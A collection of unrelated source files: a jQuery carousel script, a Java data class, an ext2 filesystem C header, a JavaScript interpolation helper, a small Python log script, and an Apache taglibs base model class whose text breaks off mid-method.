'isAtRight=', isAtRight); if (isAtLeft) { $('#scroll-left').hide(); } else if (isAtRight) { $('#scroll-right').hide(); } else { $('#scroll-left').show(); $('#scroll-right').show(); } } ) }); $('#carousel img.active').click(); }) $('#exp-types').on('click', 'a', function(){ var type = $(this).attr('href').substr(1); $(this).parent().addClass('active').siblings().removeClass(); $('#exponats-content').removeClass().addClass(type); api.reinitialise(); return false; }) $('#exp-categories').on('click', '.with-filter a', function(){ var li = $(this).parent(); console.log(li.hasClass('filtered')); if(li.hasClass('filtered')) { li.removeClass('filtered') $('#exp-filter').slideUp(); } else { li.addClass('filtered').siblings().removeClass('filtered'); $('#exp-filter').show(); } return false; }) $('#exp-filter').on('click', '#filter-handle', function(){ $('#exp-categories li').removeClass('filtered'); $('#exp-filter').slideUp(); }) $('.alphabet').on('click', 'a', function(){ $(this).toggleClass('active').siblings().removeClass('active'); return false; }) $('#exponats-tags').on('click', '.delete', function(){ var tag = $(this).prev(), tagText = tag.text(); $(this).parent().remove(); $('.fiter-results a').filter(function(index) { return $(this).text() === tagText; }).removeClass('active'); }) $('#exp-filter .fiter-results').on('click', 'a', function(){ var tag = $(this), tagText = tag.text(), newTag; if(tag.hasClass('active')) { $(this).removeClass('active'); $('#exponats-tags a').filter(function(index) { return $(this).text() === tagText; }).parent().remove(); } else { newTag = $('<li><a href="#">'+tagText+'</a><span class="delete"></span></li>') newTag.appendTo('#exponats-tags'); $(this).addClass('active'); } return false; }) $('#carousel').jcarousel({}); $(".jcarousel-container") .mousewheel(function(event, delta) { if (delta < 0) $(".jcarousel-next").click(); else if (delta > 0) $(".jcarousel-prev").click(); return false; }); $('#carousel').on('click', 'img', function(){ var borderWidth = $(this).width() - 4, borderHeight = $(this).height() - 4, imgBorder = $('<i style="width:'+36+'px; height:'+48+'px; "></i>'), fullImageSrc = $(this).attr('data-fullimage'), fullImageWidth, fullImageHeight; $(this).parent().append(imgBorder) .siblings().find('i').remove(); $(this).addClass('active') .parent().siblings().find('img').removeClass('active'); $('.main-zoomed-image img').css('opacity',0).attr('src',fullImageSrc ); fullImageWidth = $('.main-zoomed-image img').width(); fullImageHeight = $('.main-zoomed-image img').height(); $('.main-zoomed-image img').css({ 'opacity':1, 'marginLeft':-fullImageWidth/2, 'marginTop':-fullImageHeight/2 }) }) var image, imageWidth, imagePos, popupImage, imgPosLeft, imgPosTop, popupTimeout; $('#carousel').on('mouseenter', 'li', function(){ image = $(this).find('img'); imagePos = image.offset(); imgPosLeft = imagePos.left; imgPosTop = imagePos.top - 90; imageWidth = image.width(); popupImage = $('<img src="'+image.attr('src')+'" alt="" class="popup-image" style="opacity:0;top:'+imgPosTop+'px; left:'+imgPosLeft+'px" id="image_'+image.index()+'" />'); $('.popup-image').remove(); $('body').append(popupImage); imgPosLeft = imgPosLeft + 20 - popupImage.width()/2; popupImage.css({'left':imgPosLeft, 'opacity':'1'}); }); $('#carousel').on('mouseout', 'li', function(){ $('.popup-image').remove(); }) $('#details-btn').on('click', function(){ if(!$(this).data('opened')){ $('#exponats-details').show(); $('#exponat-main-container').hide(); $(this).data('opened', true); $(this).text('Спрятать детали'); } else { $('#exponats-details').hide(); $('#exponat-main-container').show(); $(this).data('opened', false); $(this).text('Детали'); } return false; }) })
Git-liuxiaoyu/cloud-hospital-parent
cloud-hospital-parent/cloud-hospital-nacos-parent/worker-service/src/main/java/com/example/workerservice/outlet/dao/mysql/po/OutRoomPo.java
package com.example.workerservice.outlet.dao.mysql.po; public class OutRoomPo { private Long id; private Integer departmentid; private String roomname; private String status; public Long getId() { return id; } public void setId(Long id) { this.id = id; } public Integer getDepartmentid() { return departmentid; } public void setDepartmentid(Integer departmentid) { this.departmentid = departmentid; } public String getRoomname() { return roomname; } public void setRoomname(String roomname) { this.roomname = roomname == null ? null : roomname.trim(); } public String getStatus() { return status; } public void setStatus(String status) { this.status = status == null ? null : status.trim(); } }
inorangestylee/lsvmtools
lsvmutils/ext2.h
<filename>lsvmutils/ext2.h<gh_stars>1-10 /* **============================================================================== ** ** LSVMTools ** ** MIT License ** ** Copyright (c) Microsoft Corporation. All rights reserved. ** ** Permission is hereby granted, free of charge, to any person obtaining a copy ** of this software and associated documentation files (the "Software"), to deal ** in the Software without restriction, including without limitation the rights ** to use, copy, modify, merge, publish, distribute, sublicense, and/or sell ** copies of the Software, and to permit persons to whom the Software is ** furnished to do so, subject to the following conditions: ** ** The above copyright notice and this permission notice shall be included in ** all copies or substantial portions of the Software. ** ** THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR ** IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ** FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE ** AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER ** LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, ** OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE ** SOFTWARE ** **============================================================================== */ #ifndef _ext2_h #define _ext2_h #include "config.h" #if !defined(BUILD_EFI) # include <stdio.h> # include <stdlib.h> #endif #include "blkdev.h" #include "strarr.h" #include "sha.h" #include "buf.h" /* **============================================================================== ** ** basic types: ** **============================================================================== */ typedef unsigned int EXT2Ino; typedef unsigned int EXT2Off; /* **============================================================================== ** ** errors: ** **============================================================================== */ #if 0 # define EXT2_USE_TYPESAFE_ERRORS #endif #define EXT2_IFERR(ERR) __EXT2IfErr(ERR) #define EXT2_ERRNO(ERR) __EXT2Errno(ERR) #if defined(EXT2_USE_TYPESAFE_ERRORS) typedef struct _EXT2Err { int errno; } EXT2Err; static __inline BOOLEAN __EXT2IfErr(EXT2Err err) { return err.errno ? 1 : 0; } static __inline unsigned int __EXT2Errno(EXT2Err err) { return err.errno; } extern const EXT2Err EXT2_ERR_NONE; extern const EXT2Err EXT2_ERR_FAILED; extern const EXT2Err EXT2_ERR_INVALID_PARAMETER; extern const EXT2Err EXT2_ERR_FILE_NOT_FOUND; extern const EXT2Err EXT2_ERR_BAD_MAGIC; extern const EXT2Err EXT2_ERR_UNSUPPORTED; extern const EXT2Err EXT2_ERR_OUT_OF_MEMORY; extern const EXT2Err EXT2_ERR_FAILED_TO_READ_SUPERBLOCK; extern const EXT2Err EXT2_ERR_FAILED_TO_READ_GROUPS; extern const EXT2Err EXT2_ERR_FAILED_TO_READ_INODE; extern const EXT2Err EXT2_ERR_UNSUPPORTED_REVISION; extern const EXT2Err EXT2_ERR_OPEN_FAILED; extern const EXT2Err EXT2_ERR_BUFFER_OVERFLOW; extern const EXT2Err EXT2_ERR_SEEK_FAILED; extern const EXT2Err EXT2_ERR_READ_FAILED; extern const EXT2Err EXT2_ERR_WRITE_FAILED; extern const EXT2Err EXT2_ERR_UNEXPECTED; extern const EXT2Err EXT2_ERR_SANITY_CHECK_FAILED; extern const EXT2Err EXT2_ERR_BAD_BLKNO; extern const EXT2Err EXT2_ERR_BAD_INO; extern const EXT2Err EXT2_ERR_BAD_GRPNO; extern const EXT2Err EXT2_ERR_BAD_MULTIPLE; extern const EXT2Err EXT2_ERR_EXTRANEOUS_DATA; extern const EXT2Err EXT2_ERR_BAD_SIZE; extern const EXT2Err EXT2_ERR_PATH_TOO_LONG; #else /* defined(EXT2_USE_TYPESAFE_ERRORS) */ typedef enum _EXT2Err { EXT2_ERR_NONE, EXT2_ERR_FAILED, EXT2_ERR_INVALID_PARAMETER, EXT2_ERR_FILE_NOT_FOUND, EXT2_ERR_BAD_MAGIC, EXT2_ERR_UNSUPPORTED, EXT2_ERR_OUT_OF_MEMORY, EXT2_ERR_FAILED_TO_READ_SUPERBLOCK, EXT2_ERR_FAILED_TO_READ_GROUPS, EXT2_ERR_FAILED_TO_READ_INODE, EXT2_ERR_UNSUPPORTED_REVISION, EXT2_ERR_OPEN_FAILED, EXT2_ERR_BUFFER_OVERFLOW, EXT2_ERR_SEEK_FAILED, EXT2_ERR_READ_FAILED, EXT2_ERR_WRITE_FAILED, EXT2_ERR_UNEXPECTED, EXT2_ERR_SANITY_CHECK_FAILED, EXT2_ERR_BAD_BLKNO, EXT2_ERR_BAD_INO, EXT2_ERR_BAD_GRPNO, EXT2_ERR_BAD_MULTIPLE, EXT2_ERR_EXTRANEOUS_DATA, EXT2_ERR_BAD_SIZE, EXT2_ERR_PATH_TOO_LONG, } EXT2Err; static __inline BOOLEAN __EXT2IfErr(EXT2Err err) { return err ? 1 : 0; } static __inline unsigned int __EXT2Errno(EXT2Err err) { return err; } #endif /* defined(EXT2_USE_TYPESAFE_ERRORS) */ const char* EXT2ErrStr( EXT2Err err); /* **============================================================================== ** ** structure typedefs: ** **============================================================================== */ typedef struct _EXT2 EXT2; typedef struct _EXT2Block EXT2Block; typedef struct _EXT2SuperBlock EXT2SuperBlock; typedef struct _EXT2GroupDesc EXT2GroupDesc; typedef struct _EXT2Inode EXT2Inode; typedef struct _EXT2DirectoryEntry EXT2DirEntry; typedef struct _EXT2_DIR EXT2_DIR; /* **============================================================================== ** ** blocks: ** **============================================================================== */ #define EXT2_MAX_BLOCK_SIZE (8 * 1024) struct _EXT2Block { UINT8 data[EXT2_MAX_BLOCK_SIZE]; UINT32 size; }; EXT2Err EXT2ReadBlock( const EXT2* ext2, UINT32 blkno, EXT2Block* block); EXT2Err EXT2WriteBlock( const EXT2* ext2, UINT32 blkno, const EXT2Block* block); /* **============================================================================== ** ** super block: ** **============================================================================== */ /* Offset of super block from start of file system */ #define EXT2_BASE_OFFSET 1024 #define EXT2_S_MAGIC 0xEF53 #define EXT2_GOOD_OLD_REV 0 /* Revision 0 EXT2 */ #define EXT2_DYNAMIC_REV 1 /* Revision 1 EXT2 */ struct _EXT2SuperBlock { /* General */ UINT32 s_inodes_count; UINT32 s_blocks_count; UINT32 s_r_blocks_count; UINT32 s_free_blocks_count; UINT32 s_free_inodes_count; UINT32 s_first_data_block; UINT32 s_log_block_size; UINT32 s_log_frag_size; UINT32 s_blocks_per_group; UINT32 s_frags_per_group; UINT32 s_inodes_per_group; UINT32 s_mtime; UINT32 s_wtime; UINT16 s_mnt_count; UINT16 s_max_mnt_count; UINT16 s_magic; UINT16 s_state; UINT16 s_errors; UINT16 s_minor_rev_level; UINT32 s_lastcheck; UINT32 s_checkinterval; UINT32 s_creator_os; UINT32 s_rev_level; UINT16 s_def_resuid; UINT16 s_def_resgid; /* DYNAMIC_REV Specific */ UINT32 s_first_ino; UINT16 s_inode_size; UINT16 s_block_group_nr; UINT32 s_feature_compat; UINT32 s_feature_incompat; UINT32 s_feature_ro_compat; UINT8 s_uuid[16]; UINT8 s_volume_name[16]; UINT8 s_last_mounted[64]; UINT32 s_algo_bitmap; /* Performance Hints */ UINT8 s_prealloc_blocks; UINT8 s_prealloc_dir_blocks; UINT16 __alignment; /* Journaling Support */ UINT8 s_journal_uuid[16]; UINT32 s_journal_inum; UINT32 s_journal_dev; UINT32 s_last_orphan; /* Directory Indexing Support */ UINT32 s_hash_seed[4]; UINT8 s_def_hash_version; UINT8 padding[3]; /* Other options */ UINT32 s_default_mount_options; UINT32 s_first_meta_bg; UINT8 __unused[760]; }; void EXT2DumpSuperBlock( const EXT2SuperBlock* sb); /* **============================================================================== ** ** groups: ** **============================================================================== */ struct _EXT2GroupDesc { UINT32 bg_block_bitmap; UINT32 bg_inode_bitmap; UINT32 bg_inode_table; UINT16 bg_free_blocks_count; UINT16 bg_free_inodes_count; UINT16 bg_used_dirs_count; UINT16 bg_pad; UINT8 bg_reserved[12]; }; /* **============================================================================== ** ** inodes: ** **============================================================================== */ #define EXT2_BAD_INO 1 #define EXT2_ROOT_INO 2 #define EXT2_ACL_IDX_INO 3 #define EXT2_ACL_DATA_INO 4 #define EXT2_BOOT_LOADER_INO 5 #define EXT2_UNDEL_DIR_INO 6 #define EXT2_FIRST_INO 11 #define EXT2_SINGLE_INDIRECT_BLOCK 12 #define EXT2_DOUBLE_INDIRECT_BLOCK 13 #define EXT2_TRIPLE_INDIRECT_BLOCK 14 #define EXT2_S_IFSOCK 0xC000 #define EXT2_S_IFLNK 0xA000 #define EXT2_S_IFREG 0x8000 #define EXT2_S_IFBLK 0x6000 #define EXT2_S_IFDIR 0x4000 #define EXT2_S_IFCHR 0x2000 #define EXT2_S_IFIFO 0x1000 #define EXT2_S_ISUID 0x0800 #define EXT2_S_ISGID 0x0400 #define EXT2_S_ISVTX 0x0200 #define EXT2_S_IRUSR 0x0100 #define EXT2_S_IWUSR 0x0080 #define EXT2_S_IXUSR 0x0040 #define EXT2_S_IRGRP 0x0020 #define EXT2_S_IWGRP 0x0010 #define EXT2_S_IXGRP 0x0008 #define EXT2_S_IROTH 0x0004 #define EXT2_S_IWOTH 0x0002 #define EXT2_S_IXOTH 0x0001 #define EXT2_SECRM_FL 0x00000001 #define EXT2_UNRM_FL 0x00000002 #define EXT2_COMPR_FL 0x00000004 #define EXT2_SYNC_FL 0x00000008 #define EXT2_IMMUTABLE_FL 0x00000010 #define EXT2_APPEND_FL 0x00000020 #define EXT2_NODUMP_FL 0x00000040 #define EXT2_NOATIME_FL 0x00000080 #define EXT2_DIRTY_FL 0x00000100 #define EXT2_COMPRBLK_FL 0x00000200 #define EXT2_NOCOMPR_FL 0x00000400 #define EXT2_ECOMPR_FL 0x00000800 #define EXT2_BTREE_FL 0x00001000 #define EXT2_INDEX_FL 0x00001000 #define EXT2_IMAGIC_FL 0x00002000 #define EXT3_JOURNAL_DATA_FL 0x00004000 #define EXT2_RESERVED_FL 0x80000000 struct _EXT2Inode { UINT16 i_mode; UINT16 i_uid; UINT32 i_size; UINT32 i_atime; UINT32 i_ctime; UINT32 i_mtime; UINT32 i_dtime; UINT16 i_gid; UINT16 i_links_count; UINT32 i_blocks; UINT32 i_flags; UINT32 i_osd1; /* 0:11 -- direct block numbers 12 -- indirect block number 13 -- double-indirect block number 14 -- triple-indirect block number */ UINT32 i_block[15]; UINT32 i_generation; UINT32 i_file_acl; UINT32 i_dir_acl; UINT32 i_faddr; UINT8 i_osd2[12]; UINT8 dummy[128]; /* sometimes the inode is bigger */ }; void EXT2DumpInode( const EXT2* ext2, const EXT2Inode* inode); EXT2Err EXT2ReadInode( const EXT2* ext2, EXT2Ino ino, EXT2Inode* inode); EXT2Err EXT2PathToIno( const EXT2* ext2, const char* path, UINT32* ino); EXT2Err EXT2PathToInode( const EXT2* ext2, const char* path, EXT2Ino* ino, EXT2Inode* inode); /* **============================================================================== ** ** bitmaps: ** **============================================================================== */ EXT2Err EXT2ReadBlockBitmap( const EXT2* ext2, UINT32 group_index, EXT2Block* block); EXT2Err EXT2WriteBlockBitmap( const EXT2* ext2, UINT32 group_index, const EXT2Block* block); EXT2Err EXT2readReadInodeBitmap( const EXT2* ext2, UINT32 group_index, EXT2Block* block); /* **============================================================================== ** ** directories: ** **============================================================================== */ #define EXT2_PATH_MAX 256 #define EXT2_FT_UNKNOWN 0 #define EXT2_FT_REG_FILE 1 #define EXT2_FT_DIR 2 #define EXT2_FT_CHRDEV 3 #define EXT2_FT_BLKDEV 4 #define EXT2_FT_FIFO 5 #define EXT2_FT_SOCK 6 #define EXT2_FT_SYMLINK 7 struct _EXT2DirectoryEntry { UINT32 inode; UINT16 rec_len; UINT8 name_len; UINT8 file_type; char name[EXT2_PATH_MAX]; }; #define EXT2_DX_HASH_LEGACY 0 #define EXT2_DX_HASH_HALF_MD4 1 #define EXT2_DX_HASH_TEA 2 #define EXT2_DT_UNKNOWN 0 #define EXT2_DT_FIFO 1 #define EXT2_DT_CHR 2 #define EXT2_DT_DIR 4 #define EXT2_DT_BLK 6 #define EXT2_DT_REG 8 #define EXT2_DT_LNK 10 #define EXT2_DT_SOCK 12 #define EXT2_DT_WHT 14 typedef struct _EXT2DirEnt { EXT2Ino d_ino; EXT2Off d_off; UINT16 d_reclen; UINT8 d_type; char d_name[EXT2_PATH_MAX]; } EXT2DirEnt; EXT2_DIR *EXT2OpenDir( const EXT2* ext2, const char *name); EXT2_DIR *EXT2OpenDirIno( const EXT2* ext2, EXT2Ino ino); EXT2DirEnt *EXT2ReadDir( EXT2_DIR *dir); EXT2Err EXT2CloseDir( EXT2_DIR* dir); EXT2Err EXT2ListDirInode( const EXT2* ext2, UINT32 global_ino, EXT2DirEnt** entries, UINT32* num_entries); /* **============================================================================== ** ** files: ** **============================================================================== */ EXT2Err EXT2LoadFileFromInode( const EXT2* ext2, const EXT2Inode* inode, void** data, UINT32* size); EXT2Err EXT2LoadFileFromPath( const EXT2* ext2, const char* path, void** data, UINT32* size); EXT2Err EXT2LoadFile( const char* path, void** data, UINT32* size); /* **============================================================================== ** ** EXT2: ** **============================================================================== */ struct _EXT2 { Blkdev* dev; EXT2SuperBlock sb; UINT32 block_size; /* block size in bytes */ UINT32 group_count; EXT2GroupDesc* groups; EXT2Inode root_inode; }; static __inline BOOLEAN EXT2Valid( const EXT2* ext2) { return ext2 != NULL && ext2->sb.s_magic == EXT2_S_MAGIC; } EXT2Err EXT2New( Blkdev* dev, EXT2** ext2); void EXT2Delete( EXT2* ext2); EXT2Err EXT2Dump( const EXT2* ext2); EXT2Err EXT2Check( const EXT2* ext2); EXT2Err EXT2Trunc( EXT2* ext2, const char* path); EXT2Err EXT2Update( EXT2* ext2, const void* data, UINT32 size, const char* path); EXT2Err EXT2Rm( EXT2* ext2, const char* path); /* rw-r--r-- */ #define EXT2_FILE_MODE_RW0_R00_R00 \ (EXT2_S_IFREG|EXT2_S_IRUSR|EXT2_S_IWUSR|EXT2_S_IRGRP|EXT2_S_IROTH) /* rw------- */ #define EXT2_FILE_MODE_RW0_000_000 (EXT2_S_IFREG|EXT2_S_IRUSR|EXT2_S_IWUSR) EXT2Err EXT2Put( EXT2* ext2, const void* data, UINT32 size, const char* path, UINT16 mode); /* See EXT2_S_* flags above */ /* rwxrx-rx- */ #define EXT2_DIR_MODE_RWX_R0X_R0X \ (EXT2_S_IFDIR | \ (EXT2_S_IRUSR|EXT2_S_IWUSR|EXT2_S_IXUSR) | \ (EXT2_S_IRGRP|EXT2_S_IXGRP) | \ (EXT2_S_IROTH|EXT2_S_IXOTH)) EXT2Err EXT2MkDir( EXT2* ext2, const char* path, UINT16 mode); /* See EXT2_S_* flags above */ EXT2Err EXT2Lsr( EXT2* ext2, const char* root, StrArr* paths); EXT2Err EXT2HashDir( EXT2* ext2, const char* root, SHA1Hash* sha1, SHA256Hash* sha256); /* **============================================================================== ** ** EXT2File: ** **============================================================================== */ typedef struct _EXT2File EXT2File; typedef enum _EXT2FileMode { EXT2FILE_RDWR, EXT2FILE_RDONLY, EXT2FILE_WRONLY } EXT2FileMode; EXT2File* EXT2OpenFile( EXT2* ext2, const char* path, EXT2FileMode mode); INTN EXT2ReadFile( EXT2File* file, void* data, UINTN size); INTN EXT2WriteFile( EXT2File* file, const void* data, UINTN size); int EXT2SeekFile( EXT2File* file, INTN offset); INTN EXT2TellFile( EXT2File* file); INTN EXT2SizeFile( EXT2File* file); int EXT2FlushFile( EXT2File* file); int EXT2CloseFile( EXT2File* file); EXT2Err EXT2WhoseBlock( EXT2* ext2, UINT32 blkno, BOOLEAN* found, char path[EXT2_PATH_MAX]); EXT2Err EXT2GetBlockNumbers( EXT2* ext2, const char* path, BufU32* blknos); UINTN EXT2BlknoToLBA( const EXT2* ext2, UINT32 blkno); /* Get the block number (LBA) of the first block of this file */ EXT2Err EXT2GetFirstBlkno( const EXT2* ext2, EXT2Ino ino, UINT32* blkno); #endif /* _ext2_h */
yeonjuan/editor
src/editor/util/interpolate-functions/makeInterpolateLength.js
import { Length } from "../../unit/Length"; import { makeInterpolateNumber } from "./makeInterpolateNumber"; import { makeInterpolateIdentity } from "./makeInterpolateIdentity"; function getRealAttributeValue (layer, property, value, refType = 'width', refElement = 'parent') { var refObject = null if (refElement === 'parent') { refObject = layer[refElement][refType]; } else if (refElement === 'self') { refObject = layer[refType]; } if (refObject) { return value.toPx(refObject.value) } return value; } function rollbackRealAttributeValue (layer, property, value, unit, refType = 'width', refElement = 'parent') { var refObject = null if (refElement === 'parent') { refObject = layer[refElement][refType]; } else if (refElement === 'self') { refObject = layer[refType]; } if (refObject) { return value.to(unit, refObject.value) } return value; } export function makeInterpolateLength(layer, property, startNumber, endNumber, refType = 'width', refElement = 'parent') { var s = Length.parse(startNumber); var e = Length.parse(endNumber); if (s.unit === e.unit) { return makeInterpolateNumber(layer, property, s.value, e.value, s.unit); } else if (s.equals(e)) { return makeInterpolateIdentity(layer, property, s); } return (rate, t) => { var realStartValue = getRealAttributeValue(layer, property, s, refType, refElement); var realEndValue = getRealAttributeValue(layer, property, e, refType, refElement); if (t === 0) { return realStartValue; } else if (t === 1) { return realEndValue; } return rollbackRealAttributeValue( layer, property, Length.px(realStartValue.value + (realEndValue.value - realStartValue.value) * rate), s.unit, refType, refElement ); } }
kosovojs/pywikibot-scripts
prepare.py
file_nakosais = eval(open(r"lv-dumpscan-nakos.txt", "r", encoding='utf-8').read()) thetext = ["* [[{}]]: {}".format(f[0],f[1]) for f in file_nakosais] with open('dfdsfdsfsdfd.log', 'w', encoding='utf-8') as file_W: file_W.write('\n'.join(thetext))
olamy/taglibs-rdc
taglibs-rdc/src/main/java/org/apache/taglibs/rdc/core/BaseModel.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.taglibs.rdc.core; import java.io.Serializable; import java.text.MessageFormat; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.ResourceBundle; import java.util.StringTokenizer; import org.apache.taglibs.rdc.RDCUtils; import org.w3c.dom.Document; /** * <p>This is the base class for all RDCs. Each atomic RDC * must extend this class. GroupModel and ComponentModel * extend this class.</p> * * @author <NAME> * @author <NAME> */ public abstract class BaseModel implements Serializable { // CONSTANTS /** The default value of the minimum confidence. Results below this * confidence will result in the associated value being treated * as invalid and the RDC will reprompt for user input. */ public static final float DEFAULT_MIN_CONFIDENCE = 0.4F; /** The unique identifier associated with this RDC */ public static final int DEFAULT_NUM_N_BEST = 1; /** The name that will be associated with the default grammar * used to refer to the initial value associated with this RDC * @see org.apache.taglibs.rdc.core.Grammar */ public static final String DEFAULT_INITIAL_GRAMMAR_NAME = "RDC_DEFAULT_INITIAL_GRAMMAR"; /** * The property under which the initial grammar is stored in the * resource bundles in org.apache.taglibs.rdc.resources */ public static final String PROPERTY_INITIAL_GRAMMAR = "rdc.core.basemodel.initialgrammar"; //Common validation errors /**A constant for errorCode when there is no error */ public static final int ERR_NONE = 635462; /**A constant for errorCode stating no default value is specified */ public static final int ERR_NO_DEFAULT = 635463; //Getters for common validation errors public final int getERR_NONE(){ return ERR_NONE; } public final int getERR_NO_DEFAULT(){ return ERR_NO_DEFAULT; } // PROPERTIES /** The unique identifier associated with this RDC */ protected String id; /** The current state of this RDC */ protected int state; /** This is used to identify the error that occured */ protected int errorCode; /** specifies whether to do confirmation or not */ protected Boolean confirm; /** Response of the user to the confirmation dialog */ protected Boolean confirmed; /** Indicates whether the current value for this RDC is valid * with respect to the supplied constraints */ protected Boolean isValid; /** The utterance of the user; what the user said */ protected String utterance; /** The normalized value for the input of this RDC */ protected String canonicalizedValue; /** The semantic interpretation returned for the input of this RDC */ protected Map interpretation; /** The URI to submit the vxml form */ protected String submit; /** Path to component grammar(s) */ protected List grammars; /** The user preference for playing back the return value associated * with the RDC */ protected Boolean echo; /** Indicates whether this RDC is invoked as a subdialog. This will * affect what happens to the value collected by the RDC */ protected Boolean subdialog; /** Indicates whether the current value for this RDC is ambiguous */ protected Boolean isAmbiguous; /** Contains the list of ambiguous values keyed on grammar conforming values * For e.g., a map of ambiguous values for say, time 5'o clock would be * Key Value * 0500a 5 A M * 0500p 5 P M */ protected Map ambiguousValues; /** The default (parsed) configuration */ protected Document configuration; /** The class of the bean that subclasses this instance */ protected String className; /** Specifies whether this RDC should emit a submit URI - * may be removed in later versions of this tag library */ protected Boolean skipSubmit; /** Value currently associated with this RDC */ protected Object value; /** The default/initial value associated with this RDC */ protected Object initial; /** The serialized n-best data from the vxml browser */ protected String candidates; /** Minimum confidence below which all values are treated as invalid */ protected float minConfidence; /** The maximum number of n-best results requested from the vxml browser */ protected int numNBest; /** Map this model's properties to the params in the request it * should look for */ protected Map paramsMap; /** The grammar available for the user to pick default/initial value * associated with this RDC */ protected Grammar initialGrammar; /** The status at exit, indicating whether this RDC collected input * or gracefully exited after a number of retries */ protected int exitStatus; /** Maximum number of client side &lt;noinput&gt; events before this RDC * gracefully exits with Constants.EXIT_MAXNOINPUT exitStatus * @see Constants#EXIT_MAXNOINPUT */ protected int maxNoInput; /** Maximum number of client side &lt;nomatch&gt; events before this RDC * gracefully exits with Constants.EXIT_MAXNOMATCH exitStatus * @see Constants#EXIT_MAXNOMATCH */ protected int maxNoMatch; /** The Locale for this RDC */ protected String locale; /** The Locale for this RDC, defaults to Constants.rdcLocale * @see Constants#rdcLocale */ protected transient Locale rdcLocale; /** The ResourceBundle for this RDC,defaults to Constants.rdcResourceBundle * @see Constants#rdcResourceBundle */ protected transient ResourceBundle rdcResourceBundle; public BaseModel() { this.id = null; this.errorCode = ERR_NONE; this.confirm = Boolean.FALSE; this.confirmed = Boolean.FALSE; this.isValid = Boolean.FALSE; this.subdialog = Boolean.FALSE; this.utterance = null; this.canonicalizedValue = null; this.submit = null; this.grammars = new ArrayList(); this.echo = Boolean.FALSE; this.isAmbiguous = Boolean.FALSE; this.ambiguousValues = null; this.configuration = null; this.className = this.getClass().getName(); this.skipSubmit = Boolean.FALSE; this.value = null; this.initial = null; this.candidates = null; this.minConfidence = DEFAULT_MIN_CONFIDENCE; this.numNBest = DEFAULT_NUM_N_BEST; this.paramsMap = new HashMap(); this.initialGrammar = null; this.exitStatus = Constants.EXIT_UNREACHED; this.maxNoInput = 0; this.maxNoMatch = 0; this.locale = Constants.locale; this.rdcLocale = Constants.rdcLocale; this.rdcResourceBundle = Constants.rdcResourceBundle; } // BaseModel constructor /** * Get the id value for this RDC * * @return the id value */ public String getId() { return id; } /** * Set the id value for this RDC * * @param id The new id value. */ public void setId(String id) { if (id.equals(Constants.STR_INIT_ONLY_FLAG)) { throw new NullPointerException(Constants.STR_INIT_ONLY_FLAG + " is a reserved key word and cannot be an id."); } this.id = id; populateParamsMap(); } /** * Get the state value * * @return the state value */ public int getState() { return state; } /** * Set the state value * * @param state The new state value */ public void setState(int state) { this.state = state; } /** * Get the errorCode value * * @return the errorCode value */ public int getErrorCode() { return errorCode; } /** * Set the errorCode value * * @param errorCode The new errorCode value */ public void setErrorCode(int errorCode) { this.errorCode = errorCode; } /** * Get the confirm value * * @return the confirm value */ public Boolean getConfirm() { return confirm; } /** * Set the confirm value. * * @param confirm The new confirm value */ public void setConfirm(Boolean confirm) { if (confirm != null) { this.confirm = confirm; } } /** * Get the response of user to the confirmation dialog * * @return the response to confirmatiom dialog * True - the user said 'yes' * False - the user said 'no' * null - the confirmation dialog hasnt taken place yet */ public Boolean getConfirmed() { return confirmed; } /** * Set the response of user to the confirmation dialog * * @param confirmed is new response to confirmation dialog */ public void setConfirmed(Boolean confirmed) { this.confirmed = confirmed; } /** * Get the whether input is valid or not * * @return the whether the input is valid or not true is valid. * True - the input is valid * False - the input is invalid * null - the validation hasnt taken place */ public Boolean getIsValid() { return isValid; } /** * Set whether value is valid or not * * @param isValid is new value to indicate whether the input is valid or not */ public void setIsValid(Boolean isValid) { this.isValid = isValid; } /** * Get whether this RDC is invoked as a subdialog * * @return subdialog The subdialog Boolean. */ public Boolean getSubdialog() { return subdialog; } /** * Set whether this RDC is invoked as a subdialog * * @param subdialog The subdialog Boolean. */ public void setSubdialog(Boolean subdialog) { this.subdialog = subdialog; } /** * Get whether the input value is ambiguous or not * * @return whether the input value is ambiguous or not * True - the input value is ambiguous * False, null - the input value is not ambiguous */ public Boolean getIsAmbiguous() { return isAmbiguous; } /** * Set whether the input value is ambiguous or not * * @param isAmbiguous is the new value to indicate whether the input is ambiguous or not */ public void setIsAmbiguous(Boolean isAmbiguous) { this.isAmbiguous = isAmbiguous; } /** * Get what the user said; the utterance of the user * * @return the utterance of the user */ public String getUtterance() { return utterance; } /** * Set what the user said * * @param utterance is the new utterance of the user */ public void setUtterance(String utterance) { this.utterance = utterance; } /** * Get the normalized value for the input * * @return the normalized value of the input */ public String getCanonicalizedValue() { return canonicalizedValue; } /** * Set the normalized value for input * * @param canonicalizedValue is the normalized value of the input */ public void setCanonicalizedValue(String canonicalizedValue) { this.canonicalizedValue = canonicalizedValue; } /** * Get the interpretation for this input * * @return interp the interpretation for this input */ public Map getInterpretation() { return interpretation; } /** * Set the interpretation for this input * * @param interp the interpretation for this input */ public void setInterpretation(Map interp) { interpretation = interp; } /** * Get the submit URI for the RDC * * @return the submit URI */ public String getSubmit() { return submit; } /** * Set the submit URI for the RDC * * @param submit - the submit URI */ public void setSubmit(String submit) { this.submit = submit; } /** * Get the grammar path(s) for the RDC * grammars is a read only property * * @return The grammar path(s) */ public List getGrammars() { return grammars; } /** * Add this <code>Grammar</code> object to the list of * grammars for this RDC. * * @param grammar - the <code>Grammar</code> object */ public void setGrammar(Grammar grammar) { 